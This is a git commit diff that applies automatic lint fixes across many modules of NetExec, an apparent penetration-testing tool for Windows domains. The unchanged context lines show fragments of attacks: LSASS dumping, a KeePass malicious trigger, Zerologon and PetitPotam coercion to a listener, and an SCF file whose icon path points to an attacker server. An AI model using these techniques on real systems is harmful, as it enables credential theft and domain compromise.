automatic ruff fixing

main
Marshall Hallenbeck 2023-09-20 11:59:16 -04:00 committed by Marshall Hallenbeck
parent a1c0080d82
commit 45fdc26847
71 changed files with 201 additions and 226 deletions

View File

@ -154,7 +154,7 @@ class connection(object):
return
def proto_flow(self):
self.logger.debug(f"Kicking off proto_flow")
self.logger.debug("Kicking off proto_flow")
self.proto_logger()
if self.create_conn_obj():
self.enum_host_info()

View File

@ -11,7 +11,8 @@ def add_user_bh(user, domain, logger, config):
if config.get("BloodHound", "bh_enabled") != "False":
try:
from neo4j.v1 import GraphDatabase
except:
except Exception as e:
logger.debug(f"Exception while importing neo4j.v1: {e}")
from neo4j import GraphDatabase
from neo4j.exceptions import AuthError, ServiceUnavailable
@ -42,13 +43,13 @@ def add_user_bh(user, domain, logger, config):
logger.debug(f'MATCH (c:{account_type} {{name:"{user_owned}"}}) SET c.owned=True RETURN c.name AS name')
result = tx.run(f'MATCH (c:{account_type} {{name:"{user_owned}"}}) SET c.owned=True RETURN c.name AS name')
logger.highlight(f"Node {user_owned} successfully set as owned in BloodHound")
except AuthError as e:
except AuthError:
logger.fail(f"Provided Neo4J credentials ({config.get('BloodHound', 'bh_user')}:{config.get('BloodHound', 'bh_pass')}) are not valid.")
return
except ServiceUnavailable as e:
except ServiceUnavailable:
logger.fail(f"Neo4J does not seem to be available on {uri}.")
return
except Exception as e:
except Exception:
logger.fail("Unexpected error with Neo4J")
logger.fail("Account not found on the domain")
return

View File

@ -47,16 +47,16 @@ class NXCModule:
search_filter = "(objectClass=pKIEnrollmentService)"
else:
search_filter = f"(distinguishedName=CN={self.server},CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,"
self.context.log.highlight("Using PKI CN: {}".format(self.server))
self.context.log.highlight(f"Using PKI CN: {self.server}")
context.log.display("Starting LDAP search with search filter '{}'".format(search_filter))
context.log.display(f"Starting LDAP search with search filter '{search_filter}'")
try:
sc = ldap.SimplePagedResultsControl()
base_dn_root = connection.ldapConnection._baseDN if self.base_dn is None else self.base_dn
if self.server is None:
resp = connection.ldapConnection.search(
connection.ldapConnection.search(
searchFilter=search_filter,
attributes=[],
sizeLimit=0,
@ -65,7 +65,7 @@ class NXCModule:
searchBase="CN=Configuration," + base_dn_root,
)
else:
resp = connection.ldapConnection.search(
connection.ldapConnection.search(
searchFilter=search_filter + base_dn_root + ")",
attributes=["certificateTemplates"],
sizeLimit=0,
@ -74,7 +74,7 @@ class NXCModule:
searchBase="CN=Configuration," + base_dn_root,
)
except LDAPSearchError as e:
context.log.fail("Obtained unexpected exception: {}".format(str(e)))
context.log.fail(f"Obtained unexpected exception: {e}")
def process_servers(self, item):
"""

View File

@ -246,7 +246,7 @@ class NXCModule:
'Successfully added the machine account "' + self.__computerName + '" with Password: "' + self.__computerPassword + '"'))
self.noLDAPRequired = True
except Exception as e:
except Exception:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
@ -283,9 +283,9 @@ class NXCModule:
result = c.delete("cn=" + self.__computerName + ",cn=Computers,dc=" + ldap_domain)
if result:
context.log.highlight(u'{}'.format('Successfully deleted the "' + self.__computerName + '" Computer account'))
elif result == False and c.last_error == "noSuchObject":
elif result is False and c.last_error == "noSuchObject":
context.log.highlight(u'{}'.format('Computer named "' + self.__computerName + '" was not found'))
elif result == False and c.last_error == "insufficientAccessRights":
elif result is False and c.last_error == "insufficientAccessRights":
context.log.highlight(
u'{}'.format('Insufficient Access Rights to delete the Computer "' + self.__computerName + '"'))
else:
@ -299,7 +299,7 @@ class NXCModule:
context.log.highlight(u'{}'.format('You can try to verify this with the nxc command:'))
context.log.highlight(u'{}'.format(
'nxc ldap ' + connection.host + ' -u ' + connection.username + ' -p ' + connection.password + ' -M group-mem -o GROUP="Domain Computers"'))
elif result == False and c.last_error == "entryAlreadyExists":
elif result is False and c.last_error == "entryAlreadyExists":
context.log.highlight(u'{}'.format('The Computer account "' + self.__computerName + '" already exists'))
elif not result:
context.log.highlight(u'{}'.format(

View File

@ -43,8 +43,8 @@ class NXCModule:
return
def execute_appcmd(self, context, connection):
command = f'powershell -c "C:\\windows\\system32\\inetsrv\\appcmd.exe list apppool /@t:*"'
context.log.info(f'Checking For Hidden Credentials With Appcmd.exe')
command = 'powershell -c "C:\\windows\\system32\\inetsrv\\appcmd.exe list apppool /@t:*"'
context.log.info('Checking For Hidden Credentials With Appcmd.exe')
output = connection.execute(command, True)
lines = output.splitlines()

View File

@ -227,7 +227,7 @@ class NXCModule:
try:
self.target_file = open(module_options["TARGET"], "r")
self.target_sAMAccountName = None
except Exception as e:
except Exception:
context.log.fail("The file doesn't exist or cannot be openned.")
else:
self.target_sAMAccountName = module_options["TARGET"]
@ -288,7 +288,7 @@ class NXCModule:
][0]
)
context.log.highlight("Found principal SID to filter on: %s" % self.principal_sid)
except Exception as e:
except Exception:
context.log.fail("Principal SID not found in LDAP (%s)" % _lookedup_principal)
exit(1)
@ -303,7 +303,7 @@ class NXCModule:
self.principal_raw_security_descriptor = str(self.target_principal[1][0][1][0]).encode("latin-1")
self.principal_security_descriptor = ldaptypes.SR_SECURITY_DESCRIPTOR(data=self.principal_raw_security_descriptor)
context.log.highlight("Target principal found in LDAP (%s)" % self.target_principal[0])
except Exception as e:
except Exception:
context.log.fail("Target SID not found in LDAP (%s)" % self.target_sAMAccountName)
exit(1)
@ -325,7 +325,7 @@ class NXCModule:
self.principal_raw_security_descriptor = str(self.target_principal[1][0][1][0]).encode("latin-1")
self.principal_security_descriptor = ldaptypes.SR_SECURITY_DESCRIPTOR(data=self.principal_raw_security_descriptor)
context.log.highlight("Target principal found in LDAP (%s)" % self.target_sAMAccountName)
except Exception as e:
except Exception:
context.log.fail("Target SID not found in LDAP (%s)" % self.target_sAMAccountName)
continue
@ -380,7 +380,7 @@ class NXCModule:
)
try:
self.target_principal = target[0]
except Exception as e:
except Exception:
context.log.fail("Principal not found in LDAP (%s), probably an LDAP session issue." % _lookedup_principal)
exit(0)
@ -397,7 +397,7 @@ class NXCModule:
dn = self.ldap_session.entries[0].entry_dn
sid = format_sid(self.ldap_session.entries[0]["objectSid"].raw_values[0])
return dn, sid
except Exception as e:
except Exception:
context.log.fail("User not found in LDAP: %s" % samname)
return False
@ -410,7 +410,7 @@ class NXCModule:
# Tries to resolve the SID from the LDAP domain dump
else:
try:
dn = self.ldap_session.search(
self.ldap_session.search(
searchBase=self.baseDN,
searchFilter="(objectSid=%s)" % sid,
attributes=["sAMAccountName"],
@ -427,7 +427,7 @@ class NXCModule:
1
][0]
return samname
except Exception as e:
except Exception:
context.log.debug("SID not found in LDAP: %s" % sid)
return ""

View File

@ -147,7 +147,7 @@ class TriggerAuth:
if self.args.verbose:
nxc_logger.debug(request.dump())
# logger.debug(request.dump())
resp = dce.request(request)
dce.request(request)
except Exception as e:
nxc_logger.debug(e)

View File

@ -100,7 +100,7 @@ class NXCModule:
verify=False,
)
except ConnectionError:
context.log.fail(f"Unable to request stager from Empire's RESTful API")
context.log.fail("Unable to request stager from Empire's RESTful API")
sys.exit(1)
if stager_response.status_code not in [200, 201]:
@ -130,7 +130,7 @@ class NXCModule:
if download_response.status_code == 200:
context.log.success(f"Successfully generated launcher for listener '{module_options['LISTENER']}'")
else:
context.log.fail(f"Something went wrong when retrieving stager Powershell command")
context.log.fail("Something went wrong when retrieving stager Powershell command")
def on_admin_login(self, context, connection):
if self.empire_launcher:

View File

@ -59,7 +59,7 @@ class NXCModule:
if product["name"] not in results:
results[product["name"]] = {"services": []}
results[product["name"]]["services"].append(service)
except Exception as e:
except Exception:
pass
success += 1
except Exception as e:
@ -146,7 +146,7 @@ class LsaLookupNames:
"""
string_binding = string_binding or self.string_binding
if not string_binding:
raise NotImplemented("String binding must be defined")
raise NotImplementedError("String binding must be defined")
rpc_transport = transport.DCERPCTransportFactory(string_binding)

View File

@ -1,7 +1,6 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import socket
import sys
class NXCModule:
'''
@ -78,7 +77,7 @@ class NXCModule:
IP = socket.gethostbyname(answer[0])
context.log.highlight(u'{} ({}) ({})'.format(answer[0],answer[1],IP))
context.log.debug('IP found')
except socket.gaierror as e:
except socket.gaierror:
context.log.debug('Missing IP')
context.log.highlight(u'{} ({}) ({})'.format(answer[0],answer[1],"No IP Found"))
else:

View File

@ -27,7 +27,7 @@ class NXCModule:
def on_admin_login(self, context, connection):
data = []
cards = connection.wmi(f"select DNSDomainSuffixSearchOrder, IPAddress from win32_networkadapterconfiguration")
cards = connection.wmi("select DNSDomainSuffixSearchOrder, IPAddress from win32_networkadapterconfiguration")
if cards:
for c in cards:
if c["IPAddress"].get("value"):
@ -35,6 +35,6 @@ class NXCModule:
data.append(cards)
log_name = "network-connections-{}-{}.log".format(connection.host, datetime.now().strftime("%Y-%m-%d_%H%M%S"))
log_name = f"network-connections-{connection.host}-{datetime.now().strftime('%Y-%m-%d_%H%M%S')}.log"
write_log(json.dumps(data), log_name)
context.log.display(f"Saved raw output to ~/.nxc/logs/{log_name}")

View File

@ -77,16 +77,16 @@ def doSearch(self,context, connection,searchFilter,attributeName):
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
attributeValue = '';
attributeValue = ''
try:
for attribute in item['attributes']:
if str(attribute['type']) == attributeName:
if attributeName == "objectSid":
attributeValue = bytes(attribute['vals'][0])
return attributeValue;
return attributeValue
elif attributeName == "distinguishedName":
attributeValue = bytes(attribute['vals'][0])
return attributeValue;
return attributeValue
else:
attributeValue = str(attribute['vals'][0])
if attributeValue is not None:

View File

@ -73,7 +73,7 @@ class NXCModule:
p = p[0]
if not p or p == "None":
context.log.fail(f"Failed to execute command to get LSASS PID")
context.log.fail("Failed to execute command to get LSASS PID")
return
# we get a CSV string back from `tasklist`, so we grab the PID from it
pid = p.split(",")[1][1:-1]

View File

@ -24,9 +24,9 @@ def neo4j_conn(context, connection, driver):
session = driver.session()
list(session.run("MATCH (g:Group) return g LIMIT 1"))
context.log.display("Connection Successful!")
except AuthError as e:
except AuthError:
context.log.fail("Invalid credentials")
except ServiceUnavailable as e:
except ServiceUnavailable:
context.log.fail("Could not connect to neo4j database")
except Exception as e:
context.log.fail("Error querying domain admins")

View File

@ -60,14 +60,14 @@ class NXCModule:
with open(file_to_upload, 'rb') as impersonate:
try:
connection.conn.putFile(self.share, f"{self.tmp_share}{self.impersonate}", impersonate.read)
context.log.success(f"Impersonate binary successfully uploaded")
context.log.success("Impersonate binary successfully uploaded")
except Exception as e:
context.log.fail(f"Error writing file to share {self.tmp_share}: {e}")
return
try:
if self.cmd == "" or self.token == "":
context.log.display(f"Listing available primary tokens")
context.log.display("Listing available primary tokens")
p = self.list_available_primary_tokens(context, connection)
for line in p.splitlines():
token, token_integrity, token_owner = line.split(" ", 2)
@ -87,13 +87,13 @@ class NXCModule:
for line in connection.execute(command, True, methods=["smbexec"]).splitlines():
context.log.highlight(line)
else:
context.log.fail(f"Invalid token ID submitted")
context.log.fail("Invalid token ID submitted")
except Exception as e:
context.log.fail(f"Error runing command: {e}")
finally:
try:
connection.conn.deleteFile(self.share, f"{self.tmp_share}{self.impersonate}")
context.log.success(f"Impersonate binary successfully deleted")
context.log.success("Impersonate binary successfully deleted")
except Exception as e:
context.log.fail(f"Error deleting Impersonate.exe on {self.share}: {e}")

View File

@ -171,9 +171,9 @@ class NXCModule:
# checks if the malicious trigger was effectively added to the specified KeePass configuration file
if self.trigger_added(context, connection):
context.log.success(f"Malicious trigger successfully added, you can now wait for KeePass reload and poll the exported files")
context.log.success("Malicious trigger successfully added, you can now wait for KeePass reload and poll the exported files")
else:
context.log.fail(f"Unknown error when adding malicious trigger to file")
context.log.fail("Unknown error when adding malicious trigger to file")
sys.exit(1)
def check_trigger_added(self, context, connection):

View File

@ -3,7 +3,7 @@
import json
from impacket.ldap import ldapasn1 as ldapasn1_impacket
from nxc.protocols.ldap.laps import LDAPConnect, LAPSv2Extract
from nxc.protocols.ldap.laps import LAPSv2Extract
class NXCModule:
"""

View File

@ -162,24 +162,24 @@ class NXCModule:
target = MSLDAPTarget(connection.host, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain)
ldapIsProtected = asyncio.run(run_ldap(target, credential))
if ldapIsProtected == False:
if ldapIsProtected is False:
context.log.highlight("LDAP Signing NOT Enforced!")
elif ldapIsProtected == True:
elif ldapIsProtected is True:
context.log.fail("LDAP Signing IS Enforced")
else:
context.log.fail("Connection fail, exiting now")
exit()
if DoesLdapsCompleteHandshake(connection.host) == True:
if DoesLdapsCompleteHandshake(connection.host) is True:
target = MSLDAPTarget(connection.host, 636, UniProto.CLIENT_SSL_TCP, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain)
ldapsChannelBindingAlwaysCheck = asyncio.run(run_ldaps_noEPA(target, credential))
target = MSLDAPTarget(connection.host, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain)
ldapsChannelBindingWhenSupportedCheck = asyncio.run(run_ldaps_withEPA(target, credential))
if ldapsChannelBindingAlwaysCheck == False and ldapsChannelBindingWhenSupportedCheck == True:
if ldapsChannelBindingAlwaysCheck is False and ldapsChannelBindingWhenSupportedCheck is True:
context.log.highlight('LDAPS Channel Binding is set to "When Supported"')
elif ldapsChannelBindingAlwaysCheck == False and ldapsChannelBindingWhenSupportedCheck == False:
elif ldapsChannelBindingAlwaysCheck is False and ldapsChannelBindingWhenSupportedCheck is False:
context.log.highlight('LDAPS Channel Binding is set to "NEVER"')
elif ldapsChannelBindingAlwaysCheck == True:
elif ldapsChannelBindingAlwaysCheck is True:
context.log.fail('LDAPS Channel Binding is set to "Required"')
else:
context.log.fail("\nSomething went wrong...")

View File

@ -75,13 +75,13 @@ class NXCModule:
credentials, tickets, masterkeys = parsed
file.close()
context.log.debug(f"Closed dumper file")
context.log.debug("Closed dumper file")
file_path = file.get_file_path()
context.log.debug(f"File path: {file_path}")
try:
deleted_file = ImpacketFile.delete(session, file_path)
if deleted_file:
context.log.debug(f"Deleted dumper file")
context.log.debug("Deleted dumper file")
else:
context.log.fail(f"[OPSEC] No exception, but failed to delete file: {file_path}")
except Exception as e:
@ -119,7 +119,7 @@ class NXCModule:
)
credentials_output.append(cred)
context.log.debug(f"Calling process_credentials")
context.log.debug("Calling process_credentials")
self.process_credentials(context, connection, credentials_output)
def process_credentials(self, context, connection, credentials):
@ -128,7 +128,7 @@ class NXCModule:
credz_bh = []
domain = None
for cred in credentials:
if cred["domain"] == None:
if cred["domain"] is None:
cred["domain"] = ""
domain = cred["domain"]
if "." not in cred["domain"] and cred["domain"].upper() in connection.domain.upper():

View File

@ -64,25 +64,25 @@ class NXCModule:
with open(file_to_upload, "rb") as msol:
try:
connection.conn.putFile(self.share, f"{self.tmp_share}{self.msol}", msol.read)
context.log.success(f"Msol script successfully uploaded")
context.log.success("Msol script successfully uploaded")
except Exception as e:
context.log.fail(f"Error writing file to share {self.tmp_share}: {e}")
return
try:
if self.cmd == "":
context.log.display(f"Executing the script")
context.log.display("Executing the script")
p = self.exec_script(context, connection)
for line in p.splitlines():
p1, p2 = line.split(" ", 1)
context.log.highlight(f"{p1} {p2}")
else:
context.log.fail(f"Script Execution Impossible")
context.log.fail("Script Execution Impossible")
except Exception as e:
context.log.fail(f"Error running command: {e}")
finally:
try:
connection.conn.deleteFile(self.share, f"{self.tmp_share}{self.msol}")
context.log.success(f"Msol script successfully deleted")
context.log.success("Msol script successfully deleted")
except Exception as e:
context.log.fail(f"[OPSEC] Error deleting msol script on {self.share}: {e}")

View File

@ -175,7 +175,7 @@ class NXCModule:
is_admin = res[0][""]
self.context.log.debug(f"IsAdmin Result: {is_admin}")
if is_admin:
self.context.log.debug(f"User is admin!")
self.context.log.debug("User is admin!")
self.admin_privs = True
return True
else:
@ -276,7 +276,7 @@ class NXCModule:
return users
def remove_sysadmin_priv(self) -> bool:
res = self.query_and_get_output(f"EXEC sp_dropsrvrolemember '{self.current_username}', 'sysadmin'")
self.query_and_get_output(f"EXEC sp_dropsrvrolemember '{self.current_username}', 'sysadmin'")
return not self.is_admin()
def is_admin_user(self, username) -> bool:

View File

@ -124,7 +124,7 @@ class NXCModule:
p = p[0]
if not p or p == "None":
self.context.log.fail(f"Failed to execute command to get LSASS PID")
self.context.log.fail("Failed to execute command to get LSASS PID")
return
pid = p.split(",")[1][1:-1]
@ -138,7 +138,7 @@ class NXCModule:
self.context.log.debug(f"NanoDump Command Result: {p}")
if not p or p == "None":
self.context.log.fail(f"Failed to execute command to execute NanoDump")
self.context.log.fail("Failed to execute command to execute NanoDump")
self.delete_nanodump_binary()
return

View File

@ -49,5 +49,5 @@ class NXCModule:
context.log.highlight("")
context.log.highlight("VULNERABLE")
context.log.highlight("Next step: https://github.com/Ridter/noPac")
except OSError as e:
except OSError:
context.log.debug(f"Error connecting to Kerberos (port 88) on {connection.host}")

View File

@ -43,8 +43,8 @@ class NXCModule:
key_handle,
"lmcompatibilitylevel\x00",
)
except rrp.DCERPCSessionError as e:
context.log.debug(f"Unable to reference lmcompatabilitylevel, which probably means ntlmv1 is not set")
except rrp.DCERPCSessionError:
context.log.debug("Unable to reference lmcompatabilitylevel, which probably means ntlmv1 is not set")
if rtype and data and int(data) in [0, 1, 2]:
context.log.highlight(self.output.format(connection.conn.getRemoteHost(), data))

View File

@ -67,8 +67,8 @@ class NXCModule:
host.signing,
petitpotam=True,
)
except Exception as e:
context.log.debug(f"Error updating petitpotam status in database")
except Exception:
context.log.debug("Error updating petitpotam status in database")
class DCERPCSessionError(DCERPCException):
@ -270,7 +270,7 @@ def efs_rpc_open_file_raw(dce, listener, context=None):
request = EfsRpcOpenFileRaw()
request["fileName"] = "\\\\%s\\test\\Settings.ini\x00" % listener
request["Flag"] = 0
resp = dce.request(request)
dce.request(request)
except Exception as e:
if str(e).find("ERROR_BAD_NETPATH") >= 0:
@ -284,7 +284,7 @@ def efs_rpc_open_file_raw(dce, listener, context=None):
try:
request = EfsRpcEncryptFileSrv()
request["FileName"] = "\\\\%s\\test\\Settings.ini\x00" % listener
resp = dce.request(request)
dce.request(request)
except Exception as e:
if str(e).find("ERROR_BAD_NETPATH") >= 0:
context.log.info("[+] Got expected ERROR_BAD_NETPATH exception!!")

View File

@ -48,8 +48,8 @@ class NXCModule:
try:
if self.cmd == "" or self.pid == "":
self.uploadfile = False
context.log.highlight(f"Firstly run tasklist.exe /v to find process id for each user")
context.log.highlight(f"Usage: -o PID=pid EXEC='Command'")
context.log.highlight("Firstly run tasklist.exe /v to find process id for each user")
context.log.highlight("Usage: -o PID=pid EXEC='Command'")
return
else:
self.uploadfile = True
@ -57,7 +57,7 @@ class NXCModule:
with open(file_to_upload, 'rb') as pi:
try:
connection.conn.putFile(self.share, f"{self.tmp_share}{self.pi}", pi.read)
context.log.success(f"pi.exe successfully uploaded")
context.log.success("pi.exe successfully uploaded")
except Exception as e:
context.log.fail(f"Error writing file to share {self.tmp_share}: {e}")
@ -72,8 +72,8 @@ class NXCModule:
context.log.fail(f"Error running command: {e}")
finally:
try:
if self.uploadfile == True:
if self.uploadfile is True:
connection.conn.deleteFile(self.share, f"{self.tmp_share}{self.pi}")
context.log.success(f"pi.exe successfully deleted")
context.log.success("pi.exe successfully deleted")
except Exception as e:
context.log.fail(f"Error deleting pi.exe on {self.share}: {e}")

View File

@ -53,7 +53,7 @@ class NXCModule:
self.dir_result = module_options["DIR_RESULT"]
def on_admin_login(self, context, connection):
if self.useembeded == True:
if self.useembeded is True:
with open(self.procdump_path + self.procdump, "wb") as procdump:
procdump.write(self.procdump_embeded)
@ -114,7 +114,6 @@ class NXCModule:
with open(self.dir_result + machine_name, "rb") as dump:
try:
credentials = []
credz_bh = []
try:
pypy_parse = pypykatz.parse_minidump_external(dump)

View File

@ -4,7 +4,6 @@
from impacket.ldap import ldapasn1 as ldapasn1_impacket
from impacket.ldap import ldap as ldap_impacket
from math import fabs
import re
class NXCModule:

View File

@ -35,7 +35,7 @@ class NXCModule:
nxc smb 192.168.1.1 -u {user} -p {password} -M rdp -o METHOD=smb ACTION={enable, disable, enable-ram, disable-ram}
nxc smb 192.168.1.1 -u {user} -p {password} -M rdp -o METHOD=wmi ACTION={enable, disable, enable-ram, disable-ram} {OLD=true} {DCOM-TIMEOUT=5}
"""
if not "ACTION" in module_options:
if "ACTION" not in module_options:
context.log.fail("ACTION option not specified!")
exit(1)
@ -45,7 +45,7 @@ class NXCModule:
self.action = module_options["ACTION"].lower()
if not "METHOD" in module_options:
if "METHOD" not in module_options:
self.method = "wmi"
else:
self.method = module_options['METHOD'].lower()
@ -54,7 +54,7 @@ class NXCModule:
context.log.fail(f"Protocol: {context.protocol} not support this method")
exit(1)
if not "DCOM-TIMEOUT" in module_options:
if "DCOM-TIMEOUT" not in module_options:
self.dcom_timeout = 10
else:
try:
@ -63,7 +63,7 @@ class NXCModule:
context.log.fail("Wrong DCOM timeout value!")
exit(1)
if not "OLD" in module_options:
if "OLD" not in module_options:
self.oldSystem = False
else:
self.oldSystem = True
@ -260,7 +260,7 @@ class rdp_WMI:
self.__dcom.disconnect()
def rdp_Wrapper(self, action, old=False):
if old == False:
if old is False:
# According to this document: https://learn.microsoft.com/en-us/windows/win32/termserv/win32-tslogonsetting
# Authentication level must set to RPC_C_AUTHN_LEVEL_PKT_PRIVACY when accessing namespace "//./root/cimv2/TerminalServices"
iWbemServices = self.__iWbemLevel1Login.NTLMLogin('//./root/cimv2/TerminalServices', NULL, NULL)
@ -293,7 +293,7 @@ class rdp_WMI:
# Need to create new iWbemServices interface in order to flush results
def query_RDPResult(self, old=False):
if old == False:
if old is False:
iWbemServices = self.__iWbemLevel1Login.NTLMLogin('//./root/cimv2/TerminalServices', NULL, NULL)
iWbemServices.get_dce_rpc().set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
self.__iWbemLevel1Login.RemRelease()
@ -338,5 +338,5 @@ class rdp_WMI:
out = StdRegProv.GetDWORDValue(2147483650, 'System\\CurrentControlSet\\Control\\Lsa', 'DisableRestrictedAdmin')
if out.uValue == 0:
self.logger.success("Enable RDP Restricted Admin Mode via WMI(ncacn_ip_tcp) successfully")
elif out.uValue == None:
elif out.uValue is None:
self.logger.success("Disable RDP Restricted Admin Mode via WMI(ncacn_ip_tcp) successfully")

View File

@ -21,6 +21,6 @@ class NXCModule:
context.log.display("Executing command")
p = connection.execute(command, True)
if "The system was unable to find the specified registry key or value" in p:
context.log.debug(f"Unable to find RunAsPPL Registry Key")
context.log.debug("Unable to find RunAsPPL Registry Key")
else:
context.log.highlight(p)

View File

@ -136,8 +136,7 @@ class NXCModule:
pass
else:
raise
targetentry = None
dnsresolver = get_dns_resolver(connection.host, context.log)
get_dns_resolver(connection.host, context.log)
outdata = []

View File

@ -53,8 +53,8 @@ class NXCModule:
if not self.cleanup:
self.server = module_options["SERVER"]
scuf = open(self.scf_path, "a")
scuf.write(f"[Shell]\n")
scuf.write(f"Command=2\n")
scuf.write("[Shell]\n")
scuf.write("Command=2\n")
scuf.write(f"IconFile=\\\\{self.server}\\share\\icon.ico\n")
scuf.close()

View File

@ -236,7 +236,7 @@ class SMBSpiderPlus:
self.spider_folder(share_name, "")
except SessionError:
traceback.print_exc()
self.logger.fail(f"Got a session error while spidering.")
self.logger.fail("Got a session error while spidering.")
self.reconnect()
except Exception as e:

View File

@ -110,18 +110,18 @@ class NXCModule:
host.signing,
spooler=True,
)
except Exception as e:
context.log.debug(f"Error updating spooler status in database")
except Exception:
context.log.debug("Error updating spooler status in database")
break
if entries:
num = len(entries)
if 1 == num:
context.log.debug(f"[Spooler] Received one endpoint")
context.log.debug("[Spooler] Received one endpoint")
else:
context.log.debug(f"[Spooler] Received {num} endpoints")
else:
context.log.debug(f"[Spooler] No endpoints found")
context.log.debug("[Spooler] No endpoints found")
def __fetch_list(self, rpctransport):
dce = rpctransport.get_dce_rpc()

View File

@ -83,7 +83,7 @@ class NXCModule:
if isinstance(subnet, ldapasn1_impacket.SearchResultEntry) is not True:
continue
subnet = searchResEntry_to_dict(subnet)
subnet_dn = subnet["distinguishedName"]
subnet["distinguishedName"]
subnet_name = subnet["name"]
if self.showservers:

View File

@ -103,7 +103,7 @@ class NXCModule:
context.log.fail(f"UNEXPECTED ERROR: {e}")
context.log.debug(traceback.format_exc())
except NotImplementedError as e:
except NotImplementedError:
pass
except Exception as e:
context.log.fail(f"UNEXPECTED ERROR: {e}")

View File

@ -4,12 +4,10 @@
import json
import logging
import operator
import sys
import time
from termcolor import colored
from nxc.logger import nxc_logger
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.dcerpc.v5 import rrp, samr, scmr
from impacket.dcerpc.v5.rrp import DCERPCSessionError
from impacket.smbconnection import SessionError as SMBSessionError
@ -305,7 +303,7 @@ class HostChecker:
# Add check to conf_checks table if missing
db_checks = self.connection.db.get_checks()
db_check_names = [ check._asdict()['name'].strip().lower() for check in db_checks ]
[ check._asdict()['name'].strip().lower() for check in db_checks ]
added = []
for i,check in enumerate(self.checks):
check.connection = self.connection
@ -646,7 +644,7 @@ class HostChecker:
ans = rrp.hBaseRegEnumKey(dce=dce, hKey=subkey_handle, dwIndex=i)
subkeys.append(ans['lpNameOut'][:-1])
i += 1
except DCERPCSessionError as e:
except DCERPCSessionError:
break
return subkeys

View File

@ -19,7 +19,7 @@ class NXCModule:
ACTION Create/Delete the registry key (choices: enable, disable, check)
"""
if not "ACTION" in module_options:
if "ACTION" not in module_options:
context.log.fail("ACTION option not specified!")
exit(1)

View File

@ -24,7 +24,7 @@ class NXCModule:
PAYLOAD Payload architecture (choices: 64 or 32) Default: 64
"""
if not "URL" in module_options:
if "URL" not in module_options:
context.log.fail("URL option is required!")
exit(1)

View File

@ -48,27 +48,27 @@ class NXCModule:
for response in r[0]["attributes"]:
if "userAccountControl" in str(response["type"]):
if str(response["vals"][0]) == "512":
context.log.highlight(f"Enabled: Yes")
context.log.highlight(f"Password Never Expires: No")
context.log.highlight("Enabled: Yes")
context.log.highlight("Password Never Expires: No")
elif str(response["vals"][0]) == "514":
context.log.highlight(f"Enabled: No")
context.log.highlight(f"Password Never Expires: No")
context.log.highlight("Enabled: No")
context.log.highlight("Password Never Expires: No")
elif str(response["vals"][0]) == "66048":
context.log.highlight(f"Enabled: Yes")
context.log.highlight(f"Password Never Expires: Yes")
context.log.highlight("Enabled: Yes")
context.log.highlight("Password Never Expires: Yes")
elif str(response["vals"][0]) == "66050":
context.log.highlight(f"Enabled: No")
context.log.highlight(f"Password Never Expires: Yes")
context.log.highlight("Enabled: No")
context.log.highlight("Password Never Expires: Yes")
elif "lastLogon" in str(response["type"]):
if str(response["vals"][0]) == "1601":
context.log.highlight(f"Last logon: Never")
context.log.highlight("Last logon: Never")
else:
context.log.highlight(f"Last logon: {response['vals'][0]}")
elif "memberOf" in str(response["type"]):
for group in response["vals"]:
context.log.highlight(f"Member of: {group}")
elif "servicePrincipalName" in str(response["type"]):
context.log.highlight(f"Service Account Name(s) found - Potentially Kerberoastable user!")
context.log.highlight("Service Account Name(s) found - Potentially Kerberoastable user!")
for spn in response["vals"]:
context.log.highlight(f"Service Account Name: {spn}")
else:

View File

@ -42,8 +42,8 @@ class NXCModule:
host.signing,
zerologon=True,
)
except Exception as e:
self.context.log.debug(f"Error updating zerologon status in database")
except Exception:
self.context.log.debug("Error updating zerologon status in database")
def perform_attack(self, dc_handle, dc_ip, target_computer):
# Keep authenticating until successful. Expected average number of attempts needed: 256.
@ -60,8 +60,8 @@ class NXCModule:
return True
else:
self.context.log.highlight("Attack failed. Target is probably patched.")
except DCERPCException as e:
self.context.log.fail(f"Error while connecting to host: DCERPCException, " f"which means this is probably not a DC!")
except DCERPCException:
self.context.log.fail("Error while connecting to host: DCERPCException, " "which means this is probably not a DC!")
def fail(msg):
nxc_logger.debug(msg)

View File

@ -11,7 +11,7 @@ from nxc.loaders.moduleloader import ModuleLoader
from nxc.servers.http import NXCHTTPServer
from nxc.first_run import first_run_setup
from nxc.context import Context
from nxc.paths import NXC_PATH, DATA_PATH
from nxc.paths import NXC_PATH
from nxc.console import nxc_console
from nxc.logger import nxc_logger
from nxc.config import nxc_config, nxc_workspace, config_log, ignore_opsec
@ -46,7 +46,7 @@ def create_db_engine(db_path):
async def start_run(protocol_obj, args, db, targets):
nxc_logger.debug(f"Creating ThreadPoolExecutor")
nxc_logger.debug("Creating ThreadPoolExecutor")
if args.no_progress or len(targets) == 1:
with ThreadPoolExecutor(max_workers=args.threads + 1) as executor:
nxc_logger.debug(f"Creating thread for {protocol_obj}")
@ -98,7 +98,7 @@ def main():
if args.protocol == "ssh":
if args.key_file:
if not args.password:
nxc_logger.fail(f"Password is required, even if a key file is used - if no passphrase for key, use `-p ''`")
nxc_logger.fail("Password is required, even if a key file is used - if no passphrase for key, use `-p ''`")
exit(1)
if args.use_kcache and not os.environ.get("KRB5CCNAME"):
@ -192,8 +192,8 @@ def main():
if not module.opsec_safe:
if ignore_opsec:
nxc_logger.debug(f"ignore_opsec is set in the configuration, skipping prompt")
nxc_logger.display(f"Ignore OPSEC in configuration is set and OPSEC unsafe module loaded")
nxc_logger.debug("ignore_opsec is set in the configuration, skipping prompt")
nxc_logger.display("Ignore OPSEC in configuration is set and OPSEC unsafe module loaded")
else:
ans = input(
highlight(

View File

@ -24,5 +24,5 @@ def parse_targets(target):
else:
for ip in ip_network(target, strict=False):
yield str(ip)
except ValueError as e:
except ValueError:
yield str(target)

View File

@ -87,7 +87,7 @@ class ftp(connection):
if self.args.ls:
files = self.list_directory_full()
self.logger.display(f"Directory Listing")
self.logger.display("Directory Listing")
for file in files:
self.logger.highlight(file)

View File

@ -176,7 +176,7 @@ class ldap(connection):
if proto == "ldaps":
